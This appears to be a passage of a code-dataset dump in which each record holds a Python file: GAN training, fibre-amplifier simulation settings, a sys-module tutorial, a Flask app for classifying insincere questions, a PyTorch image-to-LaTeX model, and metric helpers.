gen_params_out_dir, alphabetize(int(iter/10)) )\r\n return ability\r\n return None\r\n\r\n # The optimizers provided can optimize lists, tuples, or dicts of parameters.\r\n optimized_params = adam_minimax(both_objective_grad,\r\n init_gen_params, init_dsc_params, 
neighbors_function, \r\n step_size_max=step_size_max, step_size_min=step_size_min,\r\n num_iters=num_epochs * num_batches, callback=print_perf)\r\n\r\n print('Done')\r\n create_gif(out_dir)\r\n # import code; code.interact(local=dict(globals(), **locals()))","sub_path":"src/c_gan_gaussian.py","file_name":"c_gan_gaussian.py","file_ext":"py","file_size_in_byte":14819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"36802296","text":"import numpy as np\n##############################################################\n## Describe source\n\n\"\"\"Signal\"\"\" \nN_sig = 400\nP_sig_dBm = 0 # dBm\nP_sig = np.power(10,-(30-P_sig_dBm)/10) # W \nP_sig_ch = P_sig/N_sig\nWL_sig_start = 1528.38 #nm\nWL_sig_stop = 1567.95 #nm\n\nWL_sig = np.linspace(WL_sig_start, WL_sig_stop, N_sig)\nSignalf = P_sig/N_sig * np.full((N_sig,1), 1)\nSignalb = P_sig/N_sig * np.full((N_sig,1), 0)\n\n\"\"\"Pump\"\"\" \nN_pump = 1\n#P_pump multiple values for multiple values\nP_pump = {\"pump1\": 500e-3,\"pump2\": 1000e-3,\"pump3\": 500e-3}\n#P_pump = 500e-3 # W \nWL_pump = np.linspace(974, 974, N_pump)\n# Pumpf = P_pump/N_pump * np.full((N_pump,1), 0)\n# Pumpb = P_pump/N_pump * np.full((N_pump,1), 0)\nPumpf = 0/N_pump * np.full((N_pump,1), 0)\nPumpb = 0/N_pump * np.full((N_pump,1), 0)\n\n\"\"\"ASE\"\"\" \nN_ase = 401\nP_ase = 0e-8 # W \nWL_ase = np.linspace(1500, 1650, N_ase)\nASEf = P_ase/N_ase * np.full((N_ase,1), 1)\nASEb = P_ase/N_ase * np.full((N_ase,1), 1)\n\nWL = np.concatenate((WL_sig, WL_pump, WL_ase), axis=0) # duplicate power array to account for backward propagating power10\nPower = np.concatenate((Signalf, Pumpf, ASEf), axis=0) \n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\" Constants \"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nNS = 20 # Number of sections considered\n#Len and Temp_sim multiple values for multiple edfs\nedf_properties = {\"EDF1\":{\"Len\":10.6, \"Temp_sim\":65},\"EDF2\":{\"Len\":3.4, \"Temp_sim\":65},\"EDF3\":{\"Len\":6.25, \"Temp_sim\":65},\"EDF4\":{\"Len\":5.2, \"Temp_sim\":65}}\n# Len = 12 # EDF length in meters\n# Temp_sim = 22\n","sub_path":"Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"245441912","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nsys模块主要是跟python解释器打交道\n'''\n\n'''\nimport sys\n\nprint(sys.argv) #获取命令行参数,第一个参数就是程序本身\n\n#sys.exit() #退出程序,正常退出时:sys.exit(0)\n\nprint(sys.version) #获取python解释器版本\n\nprint(sys.path) #返回模块的搜索路径(python环境变量)\n\nprint(sys.platform) #操作系统平台名称\n\n#sys.stdin #输入\n#sys.stdout #输出\n#sys.stderr #错误\n'''\n\n#百分比进度显示\nimport sys\nimport time\n\ndef view_bar(num,total):\n rate = num/total\n rate_num = int(rate*100)\n r = '\\r%s%%' % (rate_num,) #\\r回到行的首位\n sys.stdout.write(r)\n sys.stdout.flush()\n\nif __name__ == '__main__':\n for i in range(101):\n time.sleep(0.1)\n view_bar(i,100)","sub_path":"day06/3-模块:sys.py","file_name":"3-模块:sys.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"355948387","text":"from flask import Flask, jsonify, request,render_template\nfrom flask_material import Material\nimport numpy as np\nfrom sklearn.externals import joblib\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.externals import joblib\nfrom scipy.sparse import hstack\nfrom bs4 import BeautifulSoup\nimport re\nimport string\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\n# https://www.tutorialspoint.com/flask\nimport flask\napp = Flask(__name__) #Flask constructor takes the name of current_Module\nMaterial(app)\n\n\n###################################################\ndef decontracted(phrase):\n # specific\n phrase = re.sub(r\"won't\", \"will not\", phrase)\n phrase = re.sub(r\"can\\'t\", \"can not\", phrase)\n\n # general\n phrase = re.sub(r\"n\\'t\", \" not\", phrase)\n phrase = re.sub(r\"\\'re\", \" are\", phrase)\n phrase = re.sub(r\"\\'s\", \" is\", phrase)\n phrase = re.sub(r\"\\'d\", \" would\", phrase)\n phrase = re.sub(r\"\\'ll\", \" will\", phrase)\n phrase = re.sub(r\"\\'t\", \" not\", phrase)\n phrase = re.sub(r\"\\'ve\", \" have\", phrase)\n phrase = re.sub(r\"\\'m\", \" am\", phrase)\n return phrase\n\n\nstopwords= set(['br', 'the', 'i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you', \"you're\", \"you've\",\\\n \"you'll\", \"you'd\", 'your', 'yours', 'yourself', 'yourselves', 'he', 'him', 'his', 'himself', \\\n 'she', \"she's\", 'her', 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them', 'their',\\\n 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this', 'that', \"that'll\", 'these', 'those', \\\n 'am', 'is', 'are', 'was', 'were', 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does', \\\n 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because', 'as', 'until', 'while', 'of', \\\n 'at', 'by', 'for', 'with', 'about', 'against', 'between', 'into', 'through', 'during', 'before', 'after',\\\n 'above', 'below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again', 'further',\\\n 'then', 'once', 'here', 'there', 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few', 'more',\\\n 'most', 'other', 'some', 'such', 'only', 'own', 'same', 'so', 'than', 'too', 'very', \\\n 's', 't', 'can', 'will', 'just', 'don', \"don't\", 'should', \"should've\", 'now', 'd', 'll', 'm', 'o', 're', \\\n 've', 'y', 'ain', 'aren', \"aren't\", 'couldn', \"couldn't\", 'didn', \"didn't\", 'doesn', \"doesn't\", 'hadn',\\\n \"hadn't\", 'hasn', \"hasn't\", 'haven', \"haven't\", 'isn', \"isn't\", 'ma', 'mightn', \"mightn't\", 'mustn',\\\n \"mustn't\", 'needn', \"needn't\", 'shan', \"shan't\", 'shouldn', \"shouldn't\", 'wasn', \"wasn't\", 'weren', \"weren't\", \\\n 'won', \"won't\", 'wouldn', \"wouldn't\"])\n\n\ndef clean_text(sentence):\n sentence = re.sub(r\"http\\S+\", \"\", sentence)\n sentence = BeautifulSoup(sentence, 'lxml').get_text()\n sentence = decontracted(sentence)\n sentence = re.sub(\"\\S*\\d\\S*\", \"\", sentence).strip()\n sentence = re.sub('[^A-Za-z]+', ' ', sentence)\n # https://gist.github.com/sebleier/554280\n sentence = ' '.join(e.lower() for e in sentence.split() if e.lower() not in stopwords)\n return sentence.strip()\n###################################################\ndef get_length(s):\n return len(s),np.array([len(s)])\n\ndef get_Words_Count(s):\n return len(s.split(\" \")),np.array([len(s.split(\" \"))])\n\ndef get_StopWords_Count(s):\n count=0\n for word in s.split(\" \"):\n if word in 
stopwords:\n count=count+1\n return count,np.array([count])\n\ndef get_UpperCase_Count(s):\n count=0\n for char in s:\n if ord(char)>=65 and ord(char)<=90:\n count=count+1\n return count,np.array([count])\n\ndef get_BadCount_Ratio(s):\n count=0\n bad_words = pd.read_csv('words_bad.txt', sep=\",\", header=None)\n words=bad_words.columns\n bad_words_arr=bad_words.iloc[0].tolist()\n final_bad_words=[]\n for word in bad_words_arr:\n word=word.strip() #Removing extra spaces from the words\n final_bad_words.append(word)\n for word in s.split(\" \"):\n if word in final_bad_words:\n count=count+1\n tot_words,tot=get_Words_Count(s)\n return count,np.array([count])\n\ndef get_Unique_Count(s):\n tot_words,tot=get_Words_Count(s)\n return len(set(s.split(\" \"))),np.array([len(set(s.split(\" \")))]),(len(set(s.split(\" \")))/tot_words)\n\ndef get_Punctuation_Count(s):\n count=0\n for ch in s:\n if ch in string.punctuation:\n count=count+1\n return count,np.array(count)\n\ndef get_Prediction(model,vectorizer):\n clf = pickle.load(open(model,'rb'))\n tfidf_vect = pickle.load(open(vectorizer,'rb'))\n to_predict_list = request.form.to_dict()\n review_text =(to_predict_list['question_text'])\n question=review_text\n length_t,length_text=get_length(review_text)\n tot_words,total_words=get_Words_Count(review_text)\n unique_count,unique_cnt,unique_cnt_ratio=get_Unique_Count(review_text)\n tot_stopwords,total_stopwords=get_StopWords_Count(review_text)\n upp_cnt,Uppercase_cnt=get_UpperCase_Count(review_text)\n punct_count,punct_cnt=get_Punctuation_Count(review_text)\n review_text = clean_text(to_predict_list['question_text'])\n tfidf_words=tfidf_vect.transform([review_text])\n bad_count,bad_cnt=get_BadCount_Ratio(review_text)\n bad_cnt_ratio=bad_count/tot_words\n punct_cnt=np.array([punct_cnt])\n data_m=hstack((tfidf_words,length_text,total_words,total_stopwords,Uppercase_cnt,bad_cnt_ratio,unique_cnt_ratio,punct_cnt,unique_cnt,bad_cnt)).tocsr()\n pred = clf.predict(data_m)\n print(pred[0])\n if pred[0]:\n prediction = \"InSincere Question\"\n else:\n prediction = \"Sincere Question\"\n word_list=review_text.split(\" \")\n data_dict={}\n data_dict['Length']=length_t\n data_dict['Total Words']=tot_words\n data_dict['Total StopWords']=tot_stopwords\n data_dict['Uppercase Count']=upp_cnt\n data_dict['BadWords Count']=bad_count\n data_dict['BadWords ratio']=bad_cnt_ratio\n data_dict['Punctuations Count']=punct_count\n data_dict['Unique Words Count']=unique_count\n data_dict['Unique Words Ratio']=unique_cnt_ratio\n if vectorizer == \"tfidf_vec.p\":\n tfidf_features=tfidf_vect.get_feature_names()\n tfidf_idf_=tfidf_vect.idf_\n word_zip=dict(zip(tfidf_features,tfidf_idf_))\n print(\"In TFIDF\")\n for word in word_list:\n print(\"In For\")\n if word in word_zip.keys():\n data_dict[word]=word_zip[word]\n data_dict['Question']=question\n data_dict['Prediction']=prediction\n return data_dict\n\n@app.route('/') #route() function is a decorator which tells the web Application which URL should call the associated\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/data_analysis')\ndef data_analyze():\n return render_template('data_analysis.html')\n\n@app.route('/index')\ndef index():\n return flask.render_template('Testing_f.html')\n\n@app.route('/compare')\ndef compare():\n return render_template('compare.html')\n\n@app.route('/view_dataset')\ndef read_dataset():\n df=pd.read_csv('sample_train.csv')\n return render_template('view_dataset.html',data_view=df)\n\n@app.route('/model_info')\ndef model_info():\n return 
render_template('model_info.html')\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n algo_selected=request.form['group1']\n text_vectorizer=request.form['group2']\n print(algo_selected)\n model_data={}\n if algo_selected==\"Naive Bayes\" and text_vectorizer==\"TFIDF\":\n data=get_Prediction('best_nb_tfidf.p','tfidf_vec.p')\n elif algo_selected==\"Logistic Regression\" and text_vectorizer==\"TFIDF\":\n data=get_Prediction('model_lr_f_best.p','tfidf_vec.p') \n elif algo_selected==\"Naive Bayes\" and text_vectorizer==\"BagOfWords\":\n data=get_Prediction('model_nb_count_best.p','count_vec.p')\n elif algo_selected==\"SVM\" and text_vectorizer ==\"BagOfWords\":\n data=get_Prediction('model_sv_f.p','count_vec.p')\n elif algo_selected==\"SVM\" and text_vectorizer==\"TFIDF\":\n data=get_Prediction('model_sv_f.p','tfidf_vec.p')\n else:\n data=get_Prediction('model_lr_best_count.p','count_vec.p')\n return render_template('prediction.html',result=data)\n\n@app.route('/predict_2', methods=['POST'])\ndef predict_2():\n if request.method == 'POST':\n print(\"HELLo\")\n algo_selected=request.form['group1']\n vec1=request.form.getlist('BOW')\n vec2=request.form.getlist('TFIDF')\n print(algo_selected)\n if algo_selected ==\"Naive Bayes\":\n data_tfidf=get_Prediction('best_nb_tfidf.p','tfidf_vec.p')\n data_cnt=get_Prediction('best_nb_tfidf.p','count_vec.p')\n data_tfidf['Text Vectorizer']='TFIDF'\n data_tfidf['alpha']=1\n data_tfidf['fit_params']='None'\n data_tfidf['scoring']='f1'\n data_tfidf['fit_prior']='true'\n data_tfidf['iid']='true'\n\n data_cnt['Text Vectorizer']='BOW'\n data_cnt['alpha']=1\n data_cnt['fit_params']='None'\n data_cnt['scoring']='f1'\n data_cnt['fit_prior']='true'\n data_cnt['iid']='true'\n return render_template('prediction_2.html',result=data_tfidf,result1=data_cnt)\n elif algo_selected == \"Logistic Regression\":\n data_tfidf=get_Prediction('model_lr_f_best.p','tfidf_vec.p')\n data_cnt=get_Prediction('model_lr_best_count.p','count_vec.p')\n data_tfidf['alpha']='0.00001'\n data_tfidf['loss']='log'\n data_tfidf['class_weight']='balanced'\n data_tfidf['epsilon']=0.1\n data_tfidf['learning_rate']='optimal'\n data_tfidf['penalty']='l2'\n data_tfidf['fit_intercept']='True'\n data_tfidf['Text vectorizer']='TFIDF'\n\n data_cnt['Text Vectorizer']='BOW'\n data_cnt['alpha']='0.00001'\n data_cnt['loss']='log'\n data_cnt['class_weight']='balanced'\n data_cnt['epsilon']=0.01\n data_cnt['learning_rate']='optimal'\n data_cnt['penalty']='l1'\n data_cnt['fit_intercept']='True'\n return render_template('prediction_2.html',result=data_tfidf,result1=data_cnt)\n else:\n data_cnt=get_Prediction('model_sv_f.p','count_vec.p')\n data_tfdif=get_Prediction('model_sv_f.p','count_vec.p')\n data_tfidf['alpha']='0.0001'\n data_tfidf['loss']='hinge'\n data_tfidf['class_weight']='balanced'\n data_tfidf['epsilon']=0.1\n data_tfidf['learning_rate']='optimal'\n data_tfidf['penalty']='l2'\n data_tfidf['fit_intercept']='True'\n data_tfidf['Text vectorizer']='TFIDF'\n\n data_cnt['alpha']='0.0001'\n data_cnt['loss']='hinge'\n data_cnt['class_weight']='balanced'\n data_cnt['epsilon']=0.01\n data_cnt['learning_rate']='optimal'\n data_cnt['penalty']='l1'\n data_cnt['fit_intercept']='True'\n data_cnt['Text Vectorizer']='BOW' \n return render_template('prediction_2.html',result=data_tfidf,result1=data_cnt)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', 
port=8080)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"556165981","text":"import sys\n# we would like to be in the src directory to have access to main files\nsys.path.append(\"..\")\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import init\nfrom torch.distributions.uniform import Uniform\nimport numpy as np\n\nclass im2latex(nn.Module):\n r\"\"\" Create the image to latex converter model.\n\n # Arguments\n\n encoder_lstm_units: The dimensionality of the output space for encoder LSTM layers\n decoder_lstm_units: The dimensionality of the output space for decoder LSTM layers\n vocab_list: The array of possible outputs of the language model\n embedding_size: The max length of the equation\n\n\n # Example\n\n .. code:: python\n latex_model = im2latx(encoder_lstm_units, decoder_lstm_units, vocab_list)\n\n model = latex_model.model\n \"\"\"\n\n def __init__(self,\n vocab_size,\n dropout=0.2,\n encoder_lstm_units=256,\n decoder_lstm_units=256,\n embedding_size=64):\n super(im2latex, self).__init__()\n self.name = 'im2latex'\n self.encoder_lstm_units = encoder_lstm_units\n self.decoder_lstm_units = decoder_lstm_units\n self.embedding_size = embedding_size\n self.vocab_size = vocab_size\n\n # encoder\n self.cnn_encoder = nn.Sequential(\n nn.Conv2d(1, 32, 3, 1),\n #nn.BatchNorm2d(num_features=64),\n nn.ReLU(),\n nn.MaxPool2d(2, 2, 0),\n\n nn.Conv2d(32, 64, 3, 1),\n #nn.BatchNorm2d(num_features=128),\n nn.ReLU(),\n nn.MaxPool2d(2, 2, 0),\n\n nn.Conv2d(64, 128, 3, 1),\n #nn.BatchNorm2d(num_features=256),\n nn.ReLU(),\n nn.MaxPool2d(2, 2, 0),\n\n # nn.Conv2d(128, 256, 3, 1),\n # #nn.BatchNorm2d(num_features=256),\n # nn.ReLU(),\n # nn.MaxPool2d(2, 2, 0),\n\n nn.Conv2d(128, self.encoder_lstm_units, 3, 1, 0),\n #nn.BatchNorm2d(num_features=self.encoder_lstm_units),\n nn.ReLU()\n )\n\n # token_decoder/encoder\n self.rnn_decoder = nn.LSTMCell(self.decoder_lstm_units+self.embedding_size, self.decoder_lstm_units)\n self.embedding = nn.Embedding(self.vocab_size, self.embedding_size)\n\n self.init_wh = nn.Linear(self.encoder_lstm_units, self.decoder_lstm_units)\n self.init_wc = nn.Linear(self.encoder_lstm_units, self.decoder_lstm_units)\n self.init_wo = nn.Linear(self.encoder_lstm_units, self.decoder_lstm_units)\n\n # attention\n self.beta = nn.Parameter(torch.Tensor(self.encoder_lstm_units))\n init.uniform_(self.beta, -1e-2, 1e-2)\n self.W_1 = nn.Linear(self.encoder_lstm_units, self.encoder_lstm_units, bias=False)\n self.W_2 = nn.Linear(self.decoder_lstm_units, self.encoder_lstm_units, bias=False)\n\n self.W_3 = nn.Linear(self.decoder_lstm_units+self.encoder_lstm_units, self.decoder_lstm_units, bias=False)\n self.W_out = nn.Linear(self.decoder_lstm_units, self.vocab_size, bias=False)\n\n self.dropout = nn.Dropout(p=dropout)\n self.uniform = Uniform(0, 1)\n \n def encode(self, imgs):\n encoded_imgs = self.cnn_encoder(imgs) # [Batchs, encoder_units, H', W']\n encoded_imgs = encoded_imgs.permute(0, 2, 3, 1) # [Batchs, H', W', encoder_units]\n B, H, W, _ = encoded_imgs.shape\n encoded_imgs = encoded_imgs.contiguous().view(B, H*W, -1) # [Batchs, H' x W', encoder_units]\n if True:\n encoded_imgs = self.add_pos_enc(encoded_imgs)\n return encoded_imgs\n \n def add_pos_enc(self, tensor, min_t=1, max_t=1e4):\n \"\"\"\n Implements the frequency-based positional encoding described\n in `Attention is all you Need\n Parameters\n ----------\n tensor : ``torch.Tensor``\n a Tensor with shape (batch_size, timesteps, hidden_dim).\n min_timescale : ``float``, optional (default = 1.0)\n The largest timescale to use.\n Returns\n 
-------\n The input tensor augmented with the sinusoidal frequencies.\n \"\"\"\n\n _, t_steps, hidden_dim = tensor.size()\n tst_range = torch.arange(0, t_steps, dtype=torch.long, device=tensor.device).data.float() # (t_steps)\n # half for both sin and cos\n n_tsc = hidden_dim//2\n tsc_range = torch.arange(0, n_tsc, dtype=torch.long, device=tensor.device).data.float() # (n_tsc)\n\n log_tsc_inc = np.log(max_t / min_t) / (n_tsc - 1) \n inv_tsc = min_t * torch.exp(tsc_range * -log_tsc_inc) # (n_tsc)\n\n scaled_time = tst_range.unsqueeze(1) * inv_tsc.unsqueeze(0) #(t_steps, n_tsc)\n sinusoids = torch.randn(scaled_time.size(0), 2*scaled_time.size(1), device=tensor.device) # (t_steps, 2 * n_tsc)\n sinusoids[:, ::2] = torch.sin(scaled_time) # even steps\n sinusoids[:, 1::2] = torch.cos(scaled_time) # odd steps\n if hidden_dim % 2 != 0:\n # if the number of dimensions is odd, the cos and sin\n # timescales had size (hidden_dim - 1) / 2, so we need\n # to add a row of zeros to make up the difference.\n sinusoids = torch.cat([sinusoids, sinusoids.new_zeros(timesteps, 1)], 1)\n\n return tensor + sinusoids.unsqueeze(0)\n \n def init_decoder(self, enc_out):\n \"\"\"args:\n enc_out: the output of row encoder [B, H*W, C]\n return:\n h_0, c_0: h_0 and c_0's shape: [B, dec_units]\n init_O : the average of enc_out [B, dec_units]\n for decoder\n \"\"\"\n mean_enc_out = enc_out.mean(dim=1)\n h = self._init_h(mean_enc_out)\n c = self._init_c(mean_enc_out)\n init_o = self._init_o(mean_enc_out)\n return (h, c), init_o\n\n def _init_h(self, mean_enc_out):\n return torch.tanh(self.init_wh(mean_enc_out))\n\n def _init_c(self, mean_enc_out):\n return torch.tanh(self.init_wc(mean_enc_out))\n\n def _init_o(self, mean_enc_out):\n return torch.tanh(self.init_wo(mean_enc_out))\n \n def _get_attn(self, encoder_output, h_t):\n \"\"\"Attention mechanism\n args:\n encoder_output: row encoder's output [B, L=H*W, C]\n h_t: the current time step hidden state [B, dec_units]\n return:\n context: this time step context [B, C]\n attn_scores: Attention scores\n \"\"\"\n # cal alpha\n alpha = torch.tanh(self.W_1(encoder_output)+self.W_2(h_t).unsqueeze(1))\n alpha = torch.sum(self.beta*alpha, dim=-1) # [B, L]\n alpha = F.softmax(alpha, dim=-1) # [B, L]\n\n # cal context: [B, C]\n # multiply the weights of each batch with the encoded img\n context = torch.bmm(alpha.unsqueeze(1), encoder_output)\n context = context.squeeze(1)\n return context, alpha\n \n def step_decoding(self, hidden_states, output_t, encoder_output, target):\n \"\"\"Runing one step decoding\"\"\"\n\n prev_y = self.embedding(target).squeeze(1) # [B, emb_size]\n inp = torch.cat([prev_y, output_t], dim=1) # [B, emb_size+dec_rnn_h]\n h_t, c_t = self.rnn_decoder(inp, hidden_states) # h_t:[B, dec_rnn_h]\n h_t = self.dropout(h_t)\n c_t = self.dropout(c_t)\n\n # context_t : [B, C]\n context_t, attn_scores = self._get_attn(encoder_output, h_t)\n\n # [B, dec_rnn_h]\n output_t = self.W_3(torch.cat([h_t, context_t], dim=1)).tanh()\n output_t = self.dropout(output_t)\n\n # calculate logit\n logit = F.softmax(self.W_out(output_t), dim=1) # [B, out_size]\n\n return (h_t, c_t), output_t, logit, attn_scores\n \n def forward(self, imgs, formulas, epsilon=1.):\n \"\"\"args:\n imgs: [B, C, H, W]\n formulas: [B, MAX_LEN]\n epsilon: probability of the current time step to\n use the true previous token\n return:\n logits: [B, MAX_LEN, VOCAB_SIZE]\n \"\"\"\n # encoding\n encoded_imgs = self.encode(imgs) # [B, H*W, 512]\n # init decoder's states\n dec_states, o_t = 
self.init_decoder(encoded_imgs)\n max_len = formulas.size(1)\n logits = []\n append_output = logits.append\n attention = []\n for t in range(max_len):\n target = formulas[:, t:t+1]\n # schedule sampling\n if logits and self.uniform.sample().item() > epsilon:\n target = torch.argmax(logits[-1], dim=1, keepdim=True)\n # ont step decoding\n dec_states, o_t, logit, attn_scores = self.step_decoding(\n dec_states, o_t, encoded_imgs, target)\n append_output(logit)\n #attention.append(attn_scores)\n logits = torch.stack(logits, dim=1) # [B, MAX_LEN, out_size]\n return logits #, attention\n","sub_path":"src/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"322301349","text":"import logging\n\ndef downsample(zone, downsample_factor=1000):\n # downsample if > downsample_factor points\n if len(zone) > downsample_factor:\n downsample = int(len(zone) / downsample_factor)\n logging.debug(f\"Downsampling by a factor of {downsample}\")\n downsampled = zone[::downsample]\n else:\n return zone\n\n # ensure that the first and last points are present\n if zone[0] != downsampled[0]:\n downsampled.insert(0, zone[0])\n if zone[-1] != downsampled[-1]:\n downsampled.append(zone[-1])\n\n return downsampled\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"52842476","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef validate_accuracy(y_true: list, y_pred: list) -> float:\n \"\"\" calculates the accuracy of predictions\n \n :param list y_true: targets\n :param list y_pred: predictions\n :return float: accuracy\n \"\"\"\n\n correct_in_batch = 0\n for i in range(len(y_true)):\n output, target = y_pred[i], y_true[i]\n \n if target == output:\n correct_in_batch += 1\n \n return round((100 * correct_in_batch / len(y_true)), 5)\n\n\ndef create_confusion_matrix(y_true: list, y_pred: list, classes: list=None, save: str=None) -> None:\n \"\"\" creates and plots a confusion matrix given two list (targets and predictions)\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param list classes: list of class names\n \"\"\"\n\n amount_classes = len(classes)\n\n confusion_matrix = np.zeros((amount_classes, amount_classes))\n for idx in range(len(y_true)):\n target = y_true[idx]\n output = y_pred[idx]\n\n confusion_matrix[target][output] += 1\n\n fig, ax = plt.subplots(1)\n\n ax.matshow(confusion_matrix)\n ax.set_xticks(np.arange(len(classes)))\n ax.set_yticks(np.arange(len(classes)))\n\n ax.set_xticklabels(classes)\n ax.set_yticklabels(classes)\n\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"left\", rotation_mode=\"anchor\")\n plt.setp(ax.get_yticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n if save != None:\n try:\n plt.savefig(save + \"/confusion_matrix.png\")\n except Exception as e:\n print(\"\\ncouldn't save confusion matrix!\")\n print(e)\n\n plt.show()\n\n\ndef true_positive_rate(y_true: list, y_pred: list, classes: int=10) -> list:\n \"\"\" calculates the true positive rate of every class\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param list classes: list of class names\n \"\"\"\n\n true_positive_list = [0 for _ in range(classes)]\n total_class_count_list = [0 for _ in range(classes)]\n\n for idx in range(len(y_true)):\n target = y_true[idx]\n output = y_pred[idx]\n\n if target == output:\n true_positive_list[target] += 1\n\n total_class_count_list[target] += 1\n\n return [true_positive_list[i] / total_class_count_list[i] for i in range(classes)]\n\n\ndef precision(y_true: list, y_pred: list, classes: int=10) -> list:\n \"\"\" calculates recall scores of classes (against all other classes)\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. 
vector)\n :param int classes: amount of classes\n :return list: list of the precision scores of each class\n \"\"\"\n\n total_prediction_of_classes, total_true_prediction_of_classes = [0 for i in range(classes)], [0 for i in range(classes)]\n for i in range(len(y_true)):\n output, target = y_pred[i], y_true[i]\n\n for class_ in range(classes):\n if output == class_:\n total_prediction_of_classes[class_] += 1\n\n if output == target:\n total_true_prediction_of_classes[class_] += 1\n\n all_precisions = [0 for i in range(classes)]\n for i in range(classes):\n if total_prediction_of_classes[i] > 0:\n all_precisions[i] = round((total_true_prediction_of_classes[i] / total_prediction_of_classes[i]), 5)\n else:\n all_precisions[i] = 0\n\n return all_precisions\n\n\ndef recall(y_true: list, y_pred: list, classes: int=10) -> list:\n \"\"\" calculates recall scores of all classes (against all other classes)\n\n :param list y_true: list of all targets (as indices of one-hot enc. vector)\n :param list y_pred: list of all predictions (as indices of one-hot enc. vector)\n :param int classes: amount of classes\n :return list: list of the recall scores of each class\n \"\"\"\n\n total_prediction_of_classes, total_true_of_classes = [0 for i in range(classes)], [0 for i in range(classes)]\n for i in range(len(y_true)):\n output, target = y_pred[i], y_true[i]\n\n for class_ in range(classes):\n if target == class_:\n total_true_of_classes[class_] += 1\n\n if output == class_:\n total_prediction_of_classes[class_] += 1\n\n all_recalls = [0 for i in range(classes)]\n for i in range(classes):\n if total_true_of_classes[i] > 0:\n all_recalls[i] = round((total_prediction_of_classes[i] / total_true_of_classes[i]), 5)\n else:\n all_recalls[i] = 0\n\n return all_recalls\n\n\ndef f1_score(precisions: list, recalls: list) -> list:\n \"\"\" calculates F1 scores of all classes (against all other classes)\n\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :return list: list of the F1 score of each class\n \"\"\"\n \n f1_scores = []\n for i in range(len(precisions)):\n precision_score, recall_score = precisions[i], recalls[i]\n\n try:\n f1_score = round((2 * ((precision_score * recall_score) / (precision_score + recall_score))), 5)\n except:\n f1_score = 0\n\n f1_scores.append(f1_score)\n\n return f1_scores\n\n\ndef score_plot(precisions: list, recalls: list, f1_scores: list, classes: dict={}, save: str=None) -> None:\n \"\"\" plots the precision-, recall- and F!-score for every class\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :param list f1_scores: list containing the f1-score of each class\n \"\"\"\n\n plt.style.use(\"bmh\")\n\n fig, axs = plt.subplots(1, 3)\n\n axs[0].bar(classes, precisions, color=\"steelblue\", alpha=0.9)\n axs[0].set_xticklabels(classes, rotation=75)\n axs[0].title.set_text(\"precision scores\")\n\n axs[1].bar(classes, recalls, color=\"orange\", alpha=0.85)\n axs[1].set_xticklabels(classes, rotation=75)\n axs[1].title.set_text(\"recall scores\")\n\n axs[2].bar(classes, f1_scores, color=\"forestgreen\", alpha=0.85)\n axs[2].set_xticklabels(classes, rotation=75)\n axs[2].title.set_text(\"f1 scores\")\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\n\n\ndef plot_true_positive_rates(true_positive_rates: list, classes: 
